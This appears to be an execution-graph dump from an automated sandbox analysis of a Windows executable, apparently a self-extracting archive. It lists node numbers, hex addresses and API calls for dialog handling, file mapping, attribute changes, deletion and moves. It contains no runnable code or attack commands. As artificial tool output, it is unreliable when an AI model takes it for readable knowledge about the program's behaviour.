                                                                                                                        execution_graph 25300 e9f1e8 FreeLibrary 23395 e913e1 84 API calls 2 library calls 23396 eab7e0 23397 eab7ea __EH_prolog 23396->23397 23562 e91316 23397->23562 23400 eab841 23401 eab82a 23401->23400 23404 eab89b 23401->23404 23405 eab838 23401->23405 23402 eabf0f 23641 ead69e 23402->23641 23407 eab92e GetDlgItemTextW 23404->23407 23412 eab8b1 23404->23412 23408 eab878 23405->23408 23409 eab83c 23405->23409 23407->23408 23415 eab96b 23407->23415 23408->23400 23416 eab95f KiUserCallbackDispatcher 23408->23416 23409->23400 23419 e9e617 53 API calls 23409->23419 23410 eabf2a SendMessageW 23411 eabf38 23410->23411 23413 eabf52 GetDlgItem SendMessageW 23411->23413 23414 eabf41 SendDlgItemMessageW 23411->23414 23418 e9e617 53 API calls 23412->23418 23659 eaa64d GetCurrentDirectoryW 23413->23659 23414->23413 23417 eab980 GetDlgItem 23415->23417 23560 eab974 23415->23560 23416->23400 23422 eab9b7 SetFocus 23417->23422 23423 eab994 SendMessageW SendMessageW 23417->23423 23424 eab8ce SetDlgItemTextW 23418->23424 23425 eab85b 23419->23425 23421 eabf82 GetDlgItem 23426 eabf9f 23421->23426 23427 eabfa5 SetWindowTextW 23421->23427 23428 eab9c7 23422->23428 23438 eab9e0 23422->23438 23423->23422 23429 eab8d9 23424->23429 23681 e9124f SHGetMalloc 23425->23681 23426->23427 23660 eaabab GetClassNameW 23427->23660 23433 e9e617 53 API calls 23428->23433 23429->23400 23436 eab8e6 GetMessageW 23429->23436 23431 eabe55 23434 e9e617 53 API calls 23431->23434 23437 eab9d1 23433->23437 23440 eabe65 SetDlgItemTextW 23434->23440 23436->23400 23442 eab8fd IsDialogMessageW 23436->23442 23682 ead4d4 23437->23682 23448 e9e617 53 API calls 23438->23448 23439 eab862 23439->23400 23444 eac1fc SetDlgItemTextW 23439->23444 23445 eabe79 23440->23445 23442->23429 23447 eab90c TranslateMessage DispatchMessageW 23442->23447 23444->23400 23450 e9e617 53 API calls 23445->23450 23447->23429 23449 eaba17 23448->23449 23452 e94092 _swprintf 51 API calls 23449->23452 23486 eabe9c _wcslen 23450->23486 23451 eabff0 23456 eac020 23451->23456 23459 e9e617 53 API calls 23451->23459 23457 eaba29 23452->23457 23453 eab9d9 23572 e9a0b1 23453->23572 23455 eac73f 97 API calls 23455->23451 23460 eac73f 97 API calls 23456->23460 23515 eac0d8 23456->23515 23461 ead4d4 16 API calls 23457->23461 23465 eac003 SetDlgItemTextW 23459->23465 23467 eac03b 23460->23467 23461->23453 23462 eac18b 23468 eac19d 23462->23468 23469 eac194 EnableWindow 23462->23469 23463 eaba73 23578 eaac04 SetCurrentDirectoryW 23463->23578 23464 eaba68 GetLastError 23464->23463 23471 e9e617 53 API calls 23465->23471 23479 eac04d 23467->23479 23506 eac072 23467->23506 23475 eac1ba 23468->23475 23700 e912d3 GetDlgItem EnableWindow 23468->23700 23469->23468 23470 eabeed 23474 e9e617 53 API calls 23470->23474 23472 eac017 SetDlgItemTextW 23471->23472 23472->23456 23473 eaba87 23477 eaba90 GetLastError 23473->23477 23478 eaba9e 23473->23478 23474->23400 23476 eac1e1 23475->23476 23491 eac1d9 SendMessageW 23475->23491 23476->23400 23493 e9e617 53 API calls 23476->23493 23477->23478 23482 eabb11 23478->23482 23487 eabb20 23478->23487 23492 eabaae GetTickCount 23478->23492 23698 ea9ed5 32 API calls 23479->23698 23480 eac0cb 23483 eac73f 97 API calls 23480->23483 23482->23487 23488 eabd56 23482->23488 23483->23515 23485 eac1b0 23701 e912d3 GetDlgItem EnableWindow 23485->23701 23486->23470 23494 e9e617 53 API calls 23486->23494 23496 eabcfb 23487->23496 23497 eabb39 GetModuleFileNameW 23487->23497 23498 eabcf1 23487->23498 23597 e912f1 GetDlgItem ShowWindow 23488->23597 23489 eac066 23489->23506 23491->23476 23579 e94092 23492->23579 23493->23439 23495 eabed0 23494->23495 23502 e94092 _swprintf 51 API calls 23495->23502 23505 e9e617 53 API calls 23496->23505 23692 e9f28c 82 API calls 23497->23692 23498->23408 23498->23496 23499 eac169 23699 ea9ed5 32 API calls 23499->23699 23502->23470 23512 eabd05 23505->23512 23506->23480 23513 eac73f 97 API calls 23506->23513 23507 eabd66 23598 e912f1 GetDlgItem ShowWindow 23507->23598 23508 eabac7 23582 e9966e 23508->23582 23509 e9e617 53 API calls 23509->23515 23510 eabb5f 23516 e94092 _swprintf 51 API calls 23510->23516 23511 eac188 23511->23462 23517 e94092 _swprintf 51 API calls 23512->23517 23518 eac0a0 23513->23518 23515->23462 23515->23499 23515->23509 23520 eabb81 CreateFileMappingW 23516->23520 23521 eabd23 23517->23521 23518->23480 23522 eac0a9 DialogBoxParamW 23518->23522 23519 eabd70 23599 e9e617 23519->23599 23525 eabbe3 GetCommandLineW 23520->23525 23555 eabc60 __InternalCxxFrameHandler 23520->23555 23534 e9e617 53 API calls 23521->23534 23522->23408 23522->23480 23528 eabbf4 23525->23528 23527 eabaed 23530 eabaff 23527->23530 23531 eabaf4 GetLastError 23527->23531 23693 eab425 SHGetMalloc 23528->23693 23590 e9959a 23530->23590 23531->23530 23537 eabd3d 23534->23537 23535 eabd8c SetDlgItemTextW GetDlgItem 23538 eabda9 GetWindowLongW SetWindowLongW 23535->23538 23539 eabdc1 23535->23539 23536 eabc10 23694 eab425 SHGetMalloc 23536->23694 23538->23539 23604 eac73f 23539->23604 23543 eabc1c 23695 eab425 SHGetMalloc 23543->23695 23544 eac73f 97 API calls 23546 eabddd 23544->23546 23629 eada52 23546->23629 23547 eabc28 23696 e9f3fa 82 API calls 2 library calls 23547->23696 23548 eabccb 23548->23498 23554 eabce1 UnmapViewOfFile CloseHandle 23548->23554 23552 eabc3f MapViewOfFile 23552->23555 23553 eac73f 97 API calls 23559 eabe03 23553->23559 23554->23498 23555->23548 23556 eabcb7 Sleep 23555->23556 23556->23548 23556->23555 23557 eabe2c 23697 e912d3 GetDlgItem EnableWindow 23557->23697 23559->23557 23561 eac73f 97 API calls 23559->23561 23560->23408 23560->23431 23561->23557 23563 e91378 23562->23563 23564 e9131f 23562->23564 23703 e9e2c1 GetWindowLongW SetWindowLongW 23563->23703 23566 e91385 23564->23566 23702 e9e2e8 62 API calls 2 library calls 23564->23702 23566->23400 23566->23401 23566->23402 23568 e91341 23568->23566 23569 e91354 GetDlgItem 23568->23569 23569->23566 23570 e91364 23569->23570 23570->23566 23571 e9136a SetWindowTextW 23570->23571 23571->23566 23573 e9a0bb 23572->23573 23574 e9a175 23573->23574 23575 e9a14c 23573->23575 23704 e9a2b2 23573->23704 23574->23463 23574->23464 23575->23574 23576 e9a2b2 8 API calls 23575->23576 23576->23574 23578->23473 23742 e94065 23579->23742 23583 e99678 23582->23583 23584 e996d5 CreateFileW 23583->23584 23585 e996c9 23583->23585 23584->23585 23586 e9971f 23585->23586 23587 e9bb03 GetCurrentDirectoryW 23585->23587 23586->23527 23588 e99704 23587->23588 23588->23586 23589 e99708 CreateFileW 23588->23589 23589->23586 23591 e995be 23590->23591 23596 e995cf 23590->23596 23592 e995ca 23591->23592 23593 e995d1 23591->23593 23591->23596 23829 e9974e 23592->23829 23834 e99620 23593->23834 23596->23482 23597->23507 23598->23519 23600 e9e627 23599->23600 23849 e9e648 23600->23849 23603 e912f1 GetDlgItem ShowWindow 23603->23535 23605 eac749 __EH_prolog 23604->23605 23606 eabdcf 23605->23606 23872 eab314 23605->23872 23606->23544 23609 eab314 ExpandEnvironmentStringsW 23614 eac780 _wcslen _wcsrchr 23609->23614 23610 eaca67 SetWindowTextW 23610->23614 23614->23606 23614->23609 23614->23610 23616 eac855 SetFileAttributesW 23614->23616 23621 eacc31 GetDlgItem SetWindowTextW SendMessageW 23614->23621 23625 eacc71 SendMessageW 23614->23625 23876 ea1fbb CompareStringW 23614->23876 23877 eaa64d GetCurrentDirectoryW 23614->23877 23879 e9a5d1 6 API calls 23614->23879 23880 e9a55a FindClose 23614->23880 23881 eab48e 76 API calls 2 library calls 23614->23881 23882 eb3e3e 23614->23882 23618 eac90f GetFileAttributesW 23616->23618 23628 eac86f _abort _wcslen 23616->23628 23618->23614 23620 eac921 DeleteFileW 23618->23620 23620->23614 23622 eac932 23620->23622 23621->23614 23623 e94092 _swprintf 51 API calls 23622->23623 23624 eac952 GetFileAttributesW 23623->23624 23624->23622 23626 eac967 MoveFileW 23624->23626 23625->23614 23626->23614 23627 eac97f MoveFileExW 23626->23627 23627->23614 23628->23614 23628->23618 23878 e9b991 51 API calls 3 library calls 23628->23878 23630 eada5c __EH_prolog 23629->23630 23906 ea0659 23630->23906 23632 eada8d 23910 e95b3d 23632->23910 23634 eadaab 23914 e97b0d 23634->23914 23638 eadafe 23930 e97b9e 23638->23930 23640 eabdee 23640->23553 23642 ead6a8 23641->23642 24428 eaa5c6 23642->24428 23645 eabf15 23645->23410 23645->23411 23646 ead6b5 GetWindow 23646->23645 23649 ead6d5 23646->23649 23647 ead6e2 GetClassNameW 24433 ea1fbb CompareStringW 23647->24433 23649->23645 23649->23647 23650 ead76a GetWindow 23649->23650 23651 ead706 GetWindowLongW 23649->23651 23650->23645 23650->23649 23651->23650 23652 ead716 SendMessageW 23651->23652 23652->23650 23653 ead72c GetObjectW 23652->23653 24434 eaa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23653->24434 23655 ead743 24435 eaa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23655->24435 24436 eaa80c 8 API calls 23655->24436 23658 ead754 SendMessageW DeleteObject 23658->23650 23659->23421 23661 eaabcc 23660->23661 23662 eaabf1 23660->23662 24439 ea1fbb CompareStringW 23661->24439 23664 eaabff 23662->23664 23665 eaabf6 SHAutoComplete 23662->23665 23668 eab093 23664->23668 23665->23664 23666 eaabdf 23666->23662 23667 eaabe3 FindWindowExW 23666->23667 23667->23662 23669 eab09d __EH_prolog 23668->23669 23670 e913dc 84 API calls 23669->23670 23671 eab0bf 23670->23671 24440 e91fdc 23671->24440 23674 eab0eb 23677 e919af 128 API calls 23674->23677 23675 eab0d9 23676 e91692 86 API calls 23675->23676 23678 eab0e4 23676->23678 23680 eab10d __InternalCxxFrameHandler ___std_exception_copy 23677->23680 23678->23451 23678->23455 23679 e91692 86 API calls 23679->23678 23680->23679 23681->23439 24448 eab568 PeekMessageW 23682->24448 23685 ead502 23689 ead50d ShowWindow SendMessageW SendMessageW 23685->23689 23686 ead536 SendMessageW SendMessageW 23687 ead572 23686->23687 23688 ead591 SendMessageW SendMessageW SendMessageW 23686->23688 23687->23688 23690 ead5e7 SendMessageW 23688->23690 23691 ead5c4 SendMessageW 23688->23691 23689->23686 23690->23453 23691->23690 23692->23510 23693->23536 23694->23543 23695->23547 23696->23552 23697->23560 23698->23489 23699->23511 23700->23485 23701->23475 23702->23568 23703->23566 23705 e9a2bf 23704->23705 23706 e9a2e3 23705->23706 23707 e9a2d6 CreateDirectoryW 23705->23707 23725 e9a231 23706->23725 23707->23706 23709 e9a316 23707->23709 23711 e9a325 23709->23711 23717 e9a4ed 23709->23717 23711->23573 23712 e9a329 GetLastError 23712->23711 23715 e9a2ff 23715->23712 23716 e9a303 CreateDirectoryW 23715->23716 23716->23709 23716->23712 23732 eaec50 23717->23732 23720 e9a53d 23720->23711 23721 e9a510 23722 e9bb03 GetCurrentDirectoryW 23721->23722 23723 e9a524 23722->23723 23723->23720 23724 e9a528 SetFileAttributesW 23723->23724 23724->23720 23734 e9a243 23725->23734 23728 e9bb03 23729 e9bb10 _wcslen 23728->23729 23730 e9bbb8 GetCurrentDirectoryW 23729->23730 23731 e9bb39 _wcslen 23729->23731 23730->23731 23731->23715 23733 e9a4fa SetFileAttributesW 23732->23733 23733->23720 23733->23721 23735 eaec50 23734->23735 23736 e9a250 GetFileAttributesW 23735->23736 23737 e9a23a 23736->23737 23738 e9a261 23736->23738 23737->23712 23737->23728 23739 e9bb03 GetCurrentDirectoryW 23738->23739 23740 e9a275 23739->23740 23740->23737 23741 e9a279 GetFileAttributesW 23740->23741 23741->23737 23743 e9407c __vsnwprintf_l 23742->23743 23746 eb5fd4 23743->23746 23749 eb4097 23746->23749 23750 eb40bf 23749->23750 23751 eb40d7 23749->23751 23773 eb91a8 20 API calls __dosmaperr 23750->23773 23751->23750 23753 eb40df 23751->23753 23775 eb4636 23753->23775 23754 eb40c4 23774 eb9087 26 API calls ___std_exception_copy 23754->23774 23760 eb4167 23784 eb49e6 51 API calls 3 library calls 23760->23784 23761 e94086 23761->23508 23764 eb40cf 23766 eafbbc 23764->23766 23765 eb4172 23785 eb46b9 20 API calls _free 23765->23785 23767 eafbc4 23766->23767 23768 eafbc5 IsProcessorFeaturePresent 23766->23768 23767->23761 23770 eafc07 23768->23770 23786 eafbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23770->23786 23772 eafcea 23772->23761 23773->23754 23774->23764 23776 eb4653 23775->23776 23782 eb40ef 23775->23782 23776->23782 23787 eb97e5 GetLastError 23776->23787 23778 eb4674 23807 eb993a 38 API calls __fassign 23778->23807 23780 eb468d 23808 eb9967 38 API calls __fassign 23780->23808 23783 eb4601 20 API calls 2 library calls 23782->23783 23783->23760 23784->23765 23785->23764 23786->23772 23788 eb97fb 23787->23788 23789 eb9801 23787->23789 23809 ebae5b 11 API calls 2 library calls 23788->23809 23793 eb9850 SetLastError 23789->23793 23810 ebb136 23789->23810 23793->23778 23794 eb981b 23817 eb8dcc 23794->23817 23797 eb9830 23797->23794 23799 eb9837 23797->23799 23798 eb9821 23800 eb985c SetLastError 23798->23800 23824 eb9649 20 API calls _abort 23799->23824 23825 eb8d24 38 API calls _abort 23800->23825 23802 eb9842 23804 eb8dcc _free 20 API calls 23802->23804 23806 eb9849 23804->23806 23806->23793 23806->23800 23807->23780 23808->23782 23809->23789 23811 ebb143 _abort 23810->23811 23812 ebb16e RtlAllocateHeap 23811->23812 23813 ebb183 23811->23813 23826 eb7a5e 7 API calls 2 library calls 23811->23826 23812->23811 23814 eb9813 23812->23814 23827 eb91a8 20 API calls __dosmaperr 23813->23827 23814->23794 23823 ebaeb1 11 API calls 2 library calls 23814->23823 23818 eb8dd7 RtlFreeHeap 23817->23818 23819 eb8e00 __dosmaperr 23817->23819 23818->23819 23820 eb8dec 23818->23820 23819->23798 23828 eb91a8 20 API calls __dosmaperr 23820->23828 23822 eb8df2 GetLastError 23822->23819 23823->23797 23824->23802 23826->23811 23827->23814 23828->23822 23830 e99781 23829->23830 23831 e99757 23829->23831 23830->23596 23831->23830 23840 e9a1e0 23831->23840 23835 e9962c 23834->23835 23836 e9964a 23834->23836 23835->23836 23838 e99638 CloseHandle 23835->23838 23837 e99669 23836->23837 23848 e96bd5 76 API calls 23836->23848 23837->23596 23838->23836 23841 eaec50 23840->23841 23842 e9a1ed DeleteFileW 23841->23842 23843 e9977f 23842->23843 23844 e9a200 23842->23844 23843->23596 23845 e9bb03 GetCurrentDirectoryW 23844->23845 23846 e9a214 23845->23846 23846->23843 23847 e9a218 DeleteFileW 23846->23847 23847->23843 23848->23837 23855 e9d9b0 23849->23855 23852 e9e66b LoadStringW 23853 e9e645 SetDlgItemTextW 23852->23853 23854 e9e682 LoadStringW 23852->23854 23853->23603 23854->23853 23860 e9d8ec 23855->23860 23857 e9d9cd 23858 e9d9e2 23857->23858 23868 e9d9f0 26 API calls 23857->23868 23858->23852 23858->23853 23861 e9d904 23860->23861 23867 e9d984 _strncpy 23860->23867 23863 e9d928 23861->23863 23869 ea1da7 WideCharToMultiByte 23861->23869 23866 e9d959 23863->23866 23870 e9e5b1 50 API calls __vsnprintf 23863->23870 23871 eb6159 26 API calls 3 library calls 23866->23871 23867->23857 23868->23858 23869->23863 23870->23866 23871->23867 23873 eab31e 23872->23873 23874 eab40d 23873->23874 23875 eab3f0 ExpandEnvironmentStringsW 23873->23875 23874->23614 23875->23874 23876->23614 23877->23614 23878->23628 23879->23614 23880->23614 23881->23614 23883 eb8e54 23882->23883 23884 eb8e6c 23883->23884 23885 eb8e61 23883->23885 23887 eb8e74 23884->23887 23893 eb8e7d _abort 23884->23893 23895 eb8e06 23885->23895 23888 eb8dcc _free 20 API calls 23887->23888 23892 eb8e69 23888->23892 23889 eb8e82 23902 eb91a8 20 API calls __dosmaperr 23889->23902 23890 eb8ea7 HeapReAlloc 23890->23892 23890->23893 23892->23614 23893->23889 23893->23890 23903 eb7a5e 7 API calls 2 library calls 23893->23903 23896 eb8e44 23895->23896 23900 eb8e14 _abort 23895->23900 23905 eb91a8 20 API calls __dosmaperr 23896->23905 23898 eb8e2f RtlAllocateHeap 23899 eb8e42 23898->23899 23898->23900 23899->23892 23900->23896 23900->23898 23904 eb7a5e 7 API calls 2 library calls 23900->23904 23902->23892 23903->23893 23904->23900 23905->23899 23907 ea0666 _wcslen 23906->23907 23934 e917e9 23907->23934 23909 ea067e 23909->23632 23911 ea0659 _wcslen 23910->23911 23912 e917e9 78 API calls 23911->23912 23913 ea067e 23912->23913 23913->23634 23915 e97b17 __EH_prolog 23914->23915 23951 e9ce40 23915->23951 23917 e97b32 23957 eaeb38 23917->23957 23919 e97b5c 23966 ea4a76 23919->23966 23922 e97c7d 23923 e97c87 23922->23923 23925 e97cf1 23923->23925 23998 e9a56d 23923->23998 23928 e97d50 23925->23928 23976 e98284 23925->23976 23926 e97d92 23926->23638 23928->23926 24004 e9138b 74 API calls 23928->24004 23931 e97bac 23930->23931 23933 e97bb3 23930->23933 23932 ea2297 86 API calls 23931->23932 23932->23933 23935 e917ff 23934->23935 23946 e9185a __InternalCxxFrameHandler 23934->23946 23936 e91828 23935->23936 23947 e96c36 76 API calls __vswprintf_c_l 23935->23947 23937 e91887 23936->23937 23943 e91847 ___std_exception_copy 23936->23943 23939 eb3e3e 22 API calls 23937->23939 23941 e9188e 23939->23941 23940 e9181e 23948 e96ca7 75 API calls 23940->23948 23941->23946 23950 e96ca7 75 API calls 23941->23950 23943->23946 23949 e96ca7 75 API calls 23943->23949 23946->23909 23947->23940 23948->23936 23949->23946 23950->23946 23952 e9ce4a __EH_prolog 23951->23952 23953 eaeb38 8 API calls 23952->23953 23954 e9ce8d 23953->23954 23955 eaeb38 8 API calls 23954->23955 23956 e9ceb1 23955->23956 23956->23917 23958 eaeb3d ___std_exception_copy 23957->23958 23959 eaeb57 23958->23959 23961 eaeb59 23958->23961 23972 eb7a5e 7 API calls 2 library calls 23958->23972 23959->23919 23962 eaf5c9 23961->23962 23973 eb238d RaiseException 23961->23973 23974 eb238d RaiseException 23962->23974 23965 eaf5e6 23967 ea4a80 __EH_prolog 23966->23967 23968 eaeb38 8 API calls 23967->23968 23969 ea4a9c 23968->23969 23970 e97b8b 23969->23970 23975 ea0e46 80 API calls 23969->23975 23970->23922 23972->23958 23973->23962 23974->23965 23975->23970 23977 e9828e __EH_prolog 23976->23977 24005 e913dc 23977->24005 23979 e982aa 23980 e982bb 23979->23980 24145 e99f42 23979->24145 23984 e982f2 23980->23984 24013 e91a04 23980->24013 24141 e91692 23984->24141 23986 e98389 24032 e98430 23986->24032 23989 e983e8 24037 e91f6d 23989->24037 23993 e983f3 23993->23984 24041 e93b2d 23993->24041 24053 e9848e 23993->24053 23995 e9a56d 7 API calls 23996 e982ee 23995->23996 23996->23984 23996->23986 23996->23995 24149 e9c0c5 CompareStringW _wcslen 23996->24149 23999 e9a582 23998->23999 24003 e9a5b0 23999->24003 24417 e9a69b 23999->24417 24001 e9a592 24002 e9a597 FindClose 24001->24002 24001->24003 24002->24003 24003->23923 24004->23926 24006 e913e1 __EH_prolog 24005->24006 24007 e9ce40 8 API calls 24006->24007 24008 e91419 24007->24008 24009 eaeb38 8 API calls 24008->24009 24012 e91474 _abort 24008->24012 24010 e91461 24009->24010 24010->24012 24151 e9b505 24010->24151 24012->23979 24014 e91a0e __EH_prolog 24013->24014 24026 e91a61 24014->24026 24028 e91b9b 24014->24028 24167 e913ba 24014->24167 24017 e91bc7 24179 e9138b 74 API calls 24017->24179 24019 e93b2d 101 API calls 24022 e91c12 24019->24022 24020 e91bd4 24020->24019 24020->24028 24021 e91c5a 24025 e91c8d 24021->24025 24021->24028 24180 e9138b 74 API calls 24021->24180 24022->24021 24024 e93b2d 101 API calls 24022->24024 24024->24022 24025->24028 24031 e99e80 79 API calls 24025->24031 24026->24017 24026->24020 24026->24028 24027 e93b2d 101 API calls 24029 e91cde 24027->24029 24028->23996 24029->24027 24029->24028 24031->24029 24200 e9cf3d 24032->24200 24034 e98440 24204 ea13d2 GetSystemTime SystemTimeToFileTime 24034->24204 24036 e983a3 24036->23989 24150 ea1b66 72 API calls 24036->24150 24038 e91f72 __EH_prolog 24037->24038 24040 e91fa6 24038->24040 24209 e919af 24038->24209 24040->23993 24042 e93b39 24041->24042 24043 e93b3d 24041->24043 24042->23993 24052 e99e80 79 API calls 24043->24052 24044 e93b4f 24045 e93b78 24044->24045 24046 e93b6a 24044->24046 24340 e9286b 101 API calls 3 library calls 24045->24340 24048 e93baa 24046->24048 24339 e932f7 89 API calls 2 library calls 24046->24339 24048->23993 24050 e93b76 24050->24048 24341 e920d7 74 API calls 24050->24341 24052->24044 24054 e98498 __EH_prolog 24053->24054 24057 e984d5 24054->24057 24068 e98513 24054->24068 24366 ea8c8d 103 API calls 24054->24366 24055 e984f5 24058 e984fa 24055->24058 24059 e9851c 24055->24059 24057->24055 24060 e9857a 24057->24060 24057->24068 24058->24068 24367 e97a0d 152 API calls 24058->24367 24059->24068 24368 ea8c8d 103 API calls 24059->24368 24060->24068 24342 e95d1a 24060->24342 24064 e98605 24064->24068 24348 e98167 24064->24348 24067 e98797 24069 e9a56d 7 API calls 24067->24069 24071 e98802 24067->24071 24068->23993 24069->24071 24070 e9d051 82 API calls 24078 e9885d 24070->24078 24354 e97c0d 24071->24354 24073 e9898b 24371 e92021 74 API calls 24073->24371 24074 e98992 24075 e98a5f 24074->24075 24080 e989e1 24074->24080 24079 e98ab6 24075->24079 24091 e98a6a 24075->24091 24078->24068 24078->24070 24078->24073 24078->24074 24369 e98117 84 API calls 24078->24369 24370 e92021 74 API calls 24078->24370 24086 e98a4c 24079->24086 24374 e97fc0 97 API calls 24079->24374 24081 e98b14 24080->24081 24082 e9a231 3 API calls 24080->24082 24080->24086 24084 e98b82 24081->24084 24128 e99105 24081->24128 24375 e998bc 24081->24375 24088 e98a19 24082->24088 24089 e9ab1a 8 API calls 24084->24089 24085 e9959a 80 API calls 24085->24068 24086->24081 24097 e98ab4 24086->24097 24087 e9959a 80 API calls 24087->24068 24088->24086 24372 e992a3 97 API calls 24088->24372 24092 e98bd1 24089->24092 24091->24097 24373 e97db2 101 API calls 24091->24373 24095 e9ab1a 8 API calls 24092->24095 24109 e98be7 24095->24109 24097->24087 24099 e98b70 24379 e96e98 77 API calls 24099->24379 24101 e98cbc 24102 e98d18 24101->24102 24103 e98e40 24101->24103 24104 e98d8a 24102->24104 24105 e98d28 24102->24105 24106 e98e52 24103->24106 24107 e98e66 24103->24107 24126 e98d49 24103->24126 24114 e98167 19 API calls 24104->24114 24110 e98d6e 24105->24110 24118 e98d37 24105->24118 24111 e99215 123 API calls 24106->24111 24108 ea3377 75 API calls 24107->24108 24112 e98e7f 24108->24112 24109->24101 24113 e98c93 24109->24113 24120 e9981a 79 API calls 24109->24120 24110->24126 24382 e977b8 111 API calls 24110->24382 24111->24126 24385 ea3020 123 API calls 24112->24385 24113->24101 24380 e99a3c 82 API calls 24113->24380 24117 e98dbd 24114->24117 24122 e98df5 24117->24122 24123 e98de6 24117->24123 24117->24126 24381 e92021 74 API calls 24118->24381 24120->24113 24384 e99155 93 API calls __EH_prolog 24122->24384 24383 e97542 85 API calls 24123->24383 24132 e98f85 24126->24132 24386 e92021 74 API calls 24126->24386 24128->24085 24129 e9a4ed 3 API calls 24131 e990eb 24129->24131 24130 e9903e 24361 e99da2 24130->24361 24131->24128 24387 e92021 74 API calls 24131->24387 24132->24128 24132->24130 24139 e99090 24132->24139 24360 e99f09 SetEndOfFile 24132->24360 24135 e99085 24137 e99620 77 API calls 24135->24137 24137->24139 24138 e990fb 24388 e96dcb 76 API calls _wcschr 24138->24388 24139->24128 24139->24129 24142 e916a4 24141->24142 24404 e9cee1 24142->24404 24146 e99f59 24145->24146 24148 e99f63 24146->24148 24416 e96d0c 78 API calls 24146->24416 24148->23980 24149->23996 24150->23989 24152 e9b50f __EH_prolog 24151->24152 24157 e9f1d0 82 API calls 24152->24157 24154 e9b521 24158 e9b61e 24154->24158 24157->24154 24159 e9b630 _abort 24158->24159 24162 ea10dc 24159->24162 24165 ea109e GetCurrentProcess GetProcessAffinityMask 24162->24165 24166 e9b597 24165->24166 24166->24012 24181 e91732 24167->24181 24169 e913d6 24170 e99e80 24169->24170 24171 e99e92 24170->24171 24172 e99ea5 24170->24172 24173 e99eb0 24171->24173 24198 e96d5b 77 API calls 24171->24198 24172->24173 24175 e99eb8 SetFilePointer 24172->24175 24173->24026 24175->24173 24176 e99ed4 GetLastError 24175->24176 24176->24173 24177 e99ede 24176->24177 24177->24173 24199 e96d5b 77 API calls 24177->24199 24179->24028 24180->24025 24182 e91748 24181->24182 24193 e917a0 __InternalCxxFrameHandler 24181->24193 24183 e91771 24182->24183 24194 e96c36 76 API calls __vswprintf_c_l 24182->24194 24185 e917c7 24183->24185 24190 e9178d ___std_exception_copy 24183->24190 24187 eb3e3e 22 API calls 24185->24187 24186 e91767 24195 e96ca7 75 API calls 24186->24195 24189 e917ce 24187->24189 24189->24193 24197 e96ca7 75 API calls 24189->24197 24190->24193 24196 e96ca7 75 API calls 24190->24196 24193->24169 24194->24186 24195->24183 24196->24193 24197->24193 24198->24172 24199->24173 24201 e9cf4d 24200->24201 24203 e9cf54 24200->24203 24205 e9981a 24201->24205 24203->24034 24204->24036 24206 e99833 24205->24206 24208 e99e80 79 API calls 24206->24208 24207 e99865 24207->24203 24208->24207 24210 e919bf 24209->24210 24212 e919bb 24209->24212 24213 e918f6 24210->24213 24212->24040 24214 e91945 24213->24214 24215 e91908 24213->24215 24221 e93fa3 24214->24221 24216 e93b2d 101 API calls 24215->24216 24219 e91928 24216->24219 24219->24212 24225 e93fac 24221->24225 24222 e93b2d 101 API calls 24222->24225 24223 e91966 24223->24219 24226 e91e50 24223->24226 24225->24222 24225->24223 24238 ea0e08 24225->24238 24227 e91e5a __EH_prolog 24226->24227 24246 e93bba 24227->24246 24229 e91e84 24230 e91732 78 API calls 24229->24230 24233 e91f0b 24229->24233 24231 e91e9b 24230->24231 24274 e918a9 78 API calls 24231->24274 24233->24219 24234 e91eb3 24236 e91ebf _wcslen 24234->24236 24275 ea1b84 MultiByteToWideChar 24234->24275 24276 e918a9 78 API calls 24236->24276 24239 ea0e0f 24238->24239 24240 ea0e2a 24239->24240 24244 e96c31 RaiseException _com_raise_error 24239->24244 24242 ea0e3b SetThreadExecutionState 24240->24242 24245 e96c31 RaiseException _com_raise_error 24240->24245 24242->24225 24244->24240 24245->24242 24247 e93bc4 __EH_prolog 24246->24247 24248 e93bda 24247->24248 24249 e93bf6 24247->24249 24302 e9138b 74 API calls 24248->24302 24251 e93e51 24249->24251 24254 e93c22 24249->24254 24319 e9138b 74 API calls 24251->24319 24252 e93be5 24252->24229 24254->24252 24277 ea3377 24254->24277 24256 e93ca3 24259 e93d2e 24256->24259 24273 e93c9a 24256->24273 24305 e9d051 24256->24305 24257 e93c9f 24257->24256 24304 e920bd 78 API calls 24257->24304 24258 e93c71 24258->24256 24258->24257 24261 e93c8f 24258->24261 24287 e9ab1a 24259->24287 24303 e9138b 74 API calls 24261->24303 24263 e93d41 24267 e93dd7 24263->24267 24268 e93dc7 24263->24268 24311 ea3020 123 API calls 24267->24311 24291 e99215 24268->24291 24271 e93dd5 24271->24273 24312 e92021 74 API calls 24271->24312 24313 ea2297 24273->24313 24274->24234 24275->24236 24276->24233 24278 ea338c 24277->24278 24280 ea3396 ___std_exception_copy 24277->24280 24320 e96ca7 75 API calls 24278->24320 24281 ea341c 24280->24281 24282 ea34c6 24280->24282 24286 ea3440 _abort 24280->24286 24321 ea32aa 75 API calls 3 library calls 24281->24321 24322 eb238d RaiseException 24282->24322 24285 ea34f2 24286->24258 24288 e9ab28 24287->24288 24290 e9ab32 24287->24290 24289 eaeb38 8 API calls 24288->24289 24289->24290 24290->24263 24292 e9921f __EH_prolog 24291->24292 24323 e97c64 24292->24323 24295 e913ba 78 API calls 24296 e99231 24295->24296 24326 e9d114 24296->24326 24298 e99243 24299 e9928a 24298->24299 24301 e9d114 118 API calls 24298->24301 24335 e9d300 97 API calls __InternalCxxFrameHandler 24298->24335 24299->24271 24301->24298 24302->24252 24303->24273 24304->24256 24306 e9d072 24305->24306 24307 e9d084 24305->24307 24336 e9603a 82 API calls 24306->24336 24337 e9603a 82 API calls 24307->24337 24310 e9d07c 24310->24259 24311->24271 24312->24273 24314 ea22a1 24313->24314 24315 ea22ba 24314->24315 24318 ea22ce 24314->24318 24338 ea0eed 86 API calls 24315->24338 24317 ea22c1 24317->24318 24319->24252 24320->24280 24321->24286 24322->24285 24324 e9b146 GetVersionExW 24323->24324 24325 e97c69 24324->24325 24325->24295 24333 e9d12a __InternalCxxFrameHandler 24326->24333 24327 e9d29a 24328 e9d2ce 24327->24328 24329 e9d0cb 6 API calls 24327->24329 24330 ea0e08 SetThreadExecutionState RaiseException 24328->24330 24329->24328 24331 e9d291 24330->24331 24331->24298 24332 ea8c8d 103 API calls 24332->24333 24333->24327 24333->24331 24333->24332 24334 e9ac05 91 API calls 24333->24334 24334->24333 24335->24298 24336->24310 24337->24310 24338->24317 24339->24050 24340->24050 24341->24048 24343 e95d2a 24342->24343 24389 e95c4b 24343->24389 24346 e95d5d 24347 e95d95 24346->24347 24394 e9b1dc 